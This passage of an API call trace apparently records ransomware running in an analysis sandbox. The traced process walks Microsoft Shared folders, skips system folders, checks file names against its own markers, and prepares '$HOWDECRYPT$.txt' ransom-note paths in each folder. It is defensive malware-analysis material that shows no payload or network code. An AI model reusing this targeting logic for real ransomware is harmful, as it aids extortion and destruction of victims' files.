[0084.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0084.873] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.873] lstrlenW (lpString="Windows") returned 7 [0084.873] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.873] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.873] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.873] lstrlenW (lpString="System Volume Information") returned 25 [0084.873] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\.") returned 55 [0084.873] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.873] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0084.873] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.873] lstrlenW (lpString="Windows") returned 7 [0084.873] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.874] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.874] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.874] lstrlenW (lpString="System Volume Information") returned 25 [0084.874] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\..") returned 56 [0084.874] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.874] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.874] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0084.874] lstrcmpiW (lpString1="DBGHELP.DLL", lpString2="Windows") returned -1 [0084.874] lstrlenW (lpString="Windows") returned 7 [0084.874] lstrcmpiW (lpString1="DBGHELP.DLL", lpString2="$Recycle.bin") returned 1 [0084.874] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.874] lstrcmpiW (lpString1="DBGHELP.DLL", lpString2="System Volume Information") returned -1 [0084.874] lstrlenW (lpString="System Volume Information") returned 25 [0084.874] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 65 [0084.874] StrStrIW (lpFirst="DBGHELP.DLL", lpSrch=".spyhunter") returned 0x0 [0084.874] lstrcmpW (lpString1="DBGHELP.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.874] lstrcmpW (lpString1="DBGHELP.DLL", lpString2="_uninstalling_.png") returned 1 [0084.874] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 65 [0084.874] GetProcessHeap () returned 0x2c0000 [0084.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x32d1e8 [0084.874] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fbd0, Size=0x628) returned 0x32fbd0 [0084.874] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0084.874] lstrcmpiW (lpString1="DW20.EXE", lpString2="Windows") returned -1 [0084.874] lstrlenW (lpString="Windows") returned 7 [0084.874] lstrcmpiW (lpString1="DW20.EXE", lpString2="$Recycle.bin") returned 1 [0084.874] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.874] lstrcmpiW (lpString1="DW20.EXE", lpString2="System Volume Information") returned -1 [0084.874] lstrlenW (lpString="System Volume Information") returned 25 [0084.874] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 62 [0084.874] StrStrIW (lpFirst="DW20.EXE", lpSrch=".spyhunter") returned 0x0 [0084.874] lstrcmpW (lpString1="DW20.EXE", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.875] lstrcmpW (lpString1="DW20.EXE", lpString2="_uninstalling_.png") returned 1 [0084.875] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 62 [0084.875] GetProcessHeap () returned 0x2c0000 [0084.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xbe) returned 0x32d428 [0084.875] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fbd0, Size=0x630) returned 0x32fbd0 [0084.875] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0084.875] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="Windows") returned -1 [0084.875] lstrlenW (lpString="Windows") returned 7 [0084.875] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="$Recycle.bin") returned 1 [0084.875] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.875] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="System Volume Information") returned -1 [0084.875] lstrlenW (lpString="System Volume Information") returned 25 [0084.875] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 66 [0084.875] StrStrIW (lpFirst="DWTRIG20.EXE", lpSrch=".spyhunter") returned 0x0 [0084.875] lstrcmpW (lpString1="DWTRIG20.EXE", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.875] lstrcmpW (lpString1="DWTRIG20.EXE", lpString2="_uninstalling_.png") returned 1 [0084.875] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 66 [0084.875] GetProcessHeap () returned 0x2c0000 [0084.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x32d2b8 [0084.875] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fbd0, Size=0x638) returned 0x32fbd0 [0084.875] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0084.875] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0084.875] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\$HOWDECRYPT$.txt") returned 70 [0084.875] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\$HOWDECRYPT$.txt") returned 70 [0084.876] GetProcessHeap () returned 0x2c0000 [0084.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x3242d8 [0084.876] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fbd0, Size=0x640) returned 0x32fbd0 [0084.876] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.876] lstrcmpiW (lpString1="EQUATION", lpString2="Windows") returned -1 [0084.876] lstrlenW (lpString="Windows") returned 7 [0084.876] lstrcmpiW (lpString1="EQUATION", lpString2="$Recycle.bin") returned 1 [0084.876] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.876] lstrcmpiW (lpString1="EQUATION", lpString2="System Volume Information") returned -1 [0084.876] lstrlenW (lpString="System Volume Information") returned 25 [0084.876] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION") returned 59 [0084.876] lstrcmpW (lpString1="EQUATION", lpString2=".") returned 1 [0084.876] lstrcmpW (lpString1="EQUATION", lpString2="..") returned 1 [0084.876] GetProcessHeap () returned 0x2c0000 [0084.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0084.876] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*") returned 61 [0084.876] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0084.877] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.877] lstrlenW (lpString="Windows") returned 7 [0084.877] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.877] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.877] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.877] lstrlenW (lpString="System Volume Information") returned 25 [0084.877] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\.") returned 61 [0084.877] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.877] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0084.877] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.877] lstrlenW (lpString="Windows") returned 7 [0084.877] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.877] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.877] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.877] lstrlenW (lpString="System Volume Information") returned 25 [0084.877] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\..") returned 62 [0084.877] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.877] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.877] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0084.877] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0084.878] lstrlenW (lpString="Windows") returned 7 [0084.878] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0084.878] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.878] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0084.878] lstrlenW (lpString="System Volume Information") returned 25 [0084.878] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033") returned 64 [0084.878] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0084.878] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0084.878] GetProcessHeap () returned 0x2c0000 [0084.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x34f030 [0084.878] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*") returned 66 [0084.878] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0084.903] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.903] lstrlenW (lpString="Windows") returned 7 [0084.903] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.903] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.903] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.903] lstrlenW (lpString="System Volume Information") returned 25 [0084.903] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\.") returned 66 [0084.903] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.903] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0084.903] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.903] lstrlenW (lpString="Windows") returned 7 [0084.903] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.903] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.903] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.903] lstrlenW (lpString="System Volume Information") returned 25 [0084.903] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\..") returned 67 [0084.903] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.903] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.903] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0084.903] lstrcmpiW (lpString1="EEINTL.DLL", lpString2="Windows") returned -1 [0084.903] lstrlenW (lpString="Windows") returned 7 [0084.903] lstrcmpiW (lpString1="EEINTL.DLL", lpString2="$Recycle.bin") returned 1 [0084.903] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.903] lstrcmpiW (lpString1="EEINTL.DLL", lpString2="System Volume Information") returned -1 [0084.903] lstrlenW (lpString="System Volume Information") returned 25 [0084.903] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 75 [0084.903] StrStrIW (lpFirst="EEINTL.DLL", lpSrch=".spyhunter") returned 0x0 [0084.903] lstrcmpW (lpString1="EEINTL.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.903] lstrcmpW (lpString1="EEINTL.DLL", lpString2="_uninstalling_.png") returned 1 [0084.904] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 75 [0084.904] GetProcessHeap () returned 0x2c0000 [0084.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x330218 [0084.904] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fbd0, Size=0x638) returned 0x32fbd0 [0084.904] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0084.904] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0084.904] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\$HOWDECRYPT$.txt") returned 81 [0084.904] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\$HOWDECRYPT$.txt") returned 81 [0084.904] GetProcessHeap () returned 0x2c0000 [0084.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x328828 [0084.904] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fbd0, Size=0x640) returned 0x32fbd0 [0084.905] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0084.905] lstrcmpiW (lpString1="EQNEDT32.CNT", lpString2="Windows") returned -1 [0084.905] lstrlenW (lpString="Windows") returned 7 [0084.905] lstrcmpiW (lpString1="EQNEDT32.CNT", lpString2="$Recycle.bin") returned 1 [0084.905] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.905] lstrcmpiW (lpString1="EQNEDT32.CNT", lpString2="System Volume Information") returned -1 [0084.905] lstrlenW (lpString="System Volume Information") returned 25 [0084.905] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 72 [0084.905] StrStrIW (lpFirst="EQNEDT32.CNT", lpSrch=".spyhunter") returned 0x0 [0084.905] lstrcmpW (lpString1="EQNEDT32.CNT", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.905] lstrcmpW (lpString1="EQNEDT32.CNT", lpString2="_uninstalling_.png") returned 1 [0084.905] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 72 [0084.905] GetProcessHeap () returned 0x2c0000 [0084.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x3302f8 [0084.905] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fbd0, Size=0x648) returned 0x3303d8 [0084.905] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0084.905] lstrcmpiW (lpString1="EQNEDT32.EXE", lpString2="Windows") returned -1 [0084.905] lstrlenW (lpString="Windows") returned 7 [0084.905] lstrcmpiW (lpString1="EQNEDT32.EXE", lpString2="$Recycle.bin") returned 1 [0084.905] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.905] lstrcmpiW (lpString1="EQNEDT32.EXE", lpString2="System Volume Information") returned -1 [0084.905] lstrlenW (lpString="System Volume Information") returned 25 [0084.905] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 72 [0084.905] StrStrIW (lpFirst="EQNEDT32.EXE", lpSrch=".spyhunter") returned 0x0 [0084.906] lstrcmpW (lpString1="EQNEDT32.EXE", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.906] lstrcmpW (lpString1="EQNEDT32.EXE", lpString2="_uninstalling_.png") returned 1 [0084.906] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 72 [0084.906] GetProcessHeap () returned 0x2c0000 [0084.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x330a28 [0084.906] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3303d8, Size=0x650) returned 0x32fb30 [0084.906] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0084.906] lstrcmpiW (lpString1="eqnedt32.exe.manifest", lpString2="Windows") returned -1 [0084.906] lstrlenW (lpString="Windows") returned 7 [0084.906] lstrcmpiW (lpString1="eqnedt32.exe.manifest", lpString2="$Recycle.bin") returned 1 [0084.906] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.906] lstrcmpiW (lpString1="eqnedt32.exe.manifest", lpString2="System Volume Information") returned -1 [0084.906] lstrlenW (lpString="System Volume Information") returned 25 [0084.906] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 81 [0084.906] StrStrIW (lpFirst="eqnedt32.exe.manifest", lpSrch=".spyhunter") returned 0x0 [0084.906] lstrcmpW (lpString1="eqnedt32.exe.manifest", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.906] lstrcmpW (lpString1="eqnedt32.exe.manifest", lpString2="_uninstalling_.png") returned 1 [0084.906] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 81 [0084.906] GetProcessHeap () returned 0x2c0000 [0084.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x328918 [0084.906] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x658) returned 0x32fb30 [0084.906] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0084.906] lstrcmpiW (lpString1="EQNEDT32.HLP", lpString2="Windows") returned -1 [0084.906] lstrlenW (lpString="Windows") returned 7 [0084.906] lstrcmpiW (lpString1="EQNEDT32.HLP", lpString2="$Recycle.bin") returned 1 [0084.906] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.906] lstrcmpiW (lpString1="EQNEDT32.HLP", lpString2="System Volume Information") returned -1 [0084.906] lstrlenW (lpString="System Volume Information") returned 25 [0084.907] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 72 [0084.907] StrStrIW (lpFirst="EQNEDT32.HLP", lpSrch=".spyhunter") returned 0x0 [0084.907] lstrcmpW (lpString1="EQNEDT32.HLP", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.907] lstrcmpW (lpString1="EQNEDT32.HLP", lpString2="_uninstalling_.png") returned 1 [0084.907] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 72 [0084.907] GetProcessHeap () returned 0x2c0000 [0084.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x3303d8 [0084.907] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x660) returned 0x32fb30 [0084.907] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0084.907] lstrcmpiW (lpString1="MTEXTRA.TTF", lpString2="Windows") returned -1 [0084.907] lstrlenW (lpString="Windows") returned 7 [0084.907] lstrcmpiW (lpString1="MTEXTRA.TTF", lpString2="$Recycle.bin") returned 1 [0084.907] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.907] lstrcmpiW (lpString1="MTEXTRA.TTF", lpString2="System Volume Information") returned -1 [0084.907] lstrlenW (lpString="System Volume Information") returned 25 [0084.907] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 71 [0084.907] StrStrIW (lpFirst="MTEXTRA.TTF", lpSrch=".spyhunter") returned 0x0 [0084.907] lstrcmpW (lpString1="MTEXTRA.TTF", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.908] lstrcmpW (lpString1="MTEXTRA.TTF", lpString2="_uninstalling_.png") returned 1 [0084.908] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 71 [0084.908] GetProcessHeap () returned 0x2c0000 [0084.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x3242d8 [0084.908] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x668) returned 0x32fb30 [0084.909] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0084.909] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0084.909] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\$HOWDECRYPT$.txt") returned 76 [0084.909] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\$HOWDECRYPT$.txt") returned 76 [0084.909] GetProcessHeap () returned 0x2c0000 [0084.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3272b0 [0084.909] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x670) returned 0x32fb30 [0084.909] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.909] lstrcmpiW (lpString1="EURO", lpString2="Windows") returned -1 [0084.909] lstrlenW (lpString="Windows") returned 7 [0084.909] lstrcmpiW (lpString1="EURO", lpString2="$Recycle.bin") returned 1 [0084.909] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.909] lstrcmpiW (lpString1="EURO", lpString2="System Volume Information") returned -1 [0084.909] lstrlenW (lpString="System Volume Information") returned 25 [0084.909] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO") returned 55 [0084.909] lstrcmpW (lpString1="EURO", lpString2=".") returned 1 [0084.909] lstrcmpW (lpString1="EURO", lpString2="..") returned 1 [0084.909] GetProcessHeap () returned 0x2c0000 [0084.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x364908 [0084.910] wnsprintfW (in: pszDest=0x364908, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*") returned 57 [0084.910] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0085.400] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.400] lstrlenW (lpString="Windows") returned 7 [0085.400] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.400] lstrlenW (lpString="$Recycle.bin") returned 12 [0085.400] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.400] lstrlenW (lpString="System Volume Information") returned 25 [0085.400] wnsprintfW (in: pszDest=0x364908, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\.") returned 57 [0085.400] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.400] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0085.400] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.400] lstrlenW (lpString="Windows") returned 7 [0085.400] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.400] lstrlenW (lpString="$Recycle.bin") returned 12 [0085.400] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.400] lstrlenW (lpString="System Volume Information") returned 25 [0085.400] wnsprintfW (in: pszDest=0x364908, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\..") returned 58 [0085.400] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.401] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.401] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0085.401] lstrcmpiW (lpString1="MSOEURO.DLL", lpString2="Windows") returned -1 [0085.401] lstrlenW (lpString="Windows") returned 7 [0085.401] lstrcmpiW (lpString1="MSOEURO.DLL", lpString2="$Recycle.bin") returned 1 [0085.401] lstrlenW (lpString="$Recycle.bin") returned 12 [0085.401] lstrcmpiW (lpString1="MSOEURO.DLL", lpString2="System Volume Information") returned -1 [0085.401] lstrlenW (lpString="System Volume Information") returned 25 [0085.401] wnsprintfW (in: pszDest=0x364908, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 67 [0085.401] StrStrIW (lpFirst="MSOEURO.DLL", lpSrch=".spyhunter") returned 0x0 [0085.401] lstrcmpW (lpString1="MSOEURO.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0085.401] lstrcmpW (lpString1="MSOEURO.DLL", lpString2="_uninstalling_.png") returned 1 [0085.401] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 67 [0085.401] GetProcessHeap () returned 0x2c0000 [0085.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x32f728 [0085.401] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x658) returned 0x32fb30 [0085.401] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0085.401] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0085.401] wnsprintfW (in: pszDest=0x364908, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\$HOWDECRYPT$.txt") returned 72 [0085.401] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\$HOWDECRYPT$.txt") returned 72 [0085.401] GetProcessHeap () returned 0x2c0000 [0085.401] RtlAllocateHeap (HeapHandle=0x2c0000, 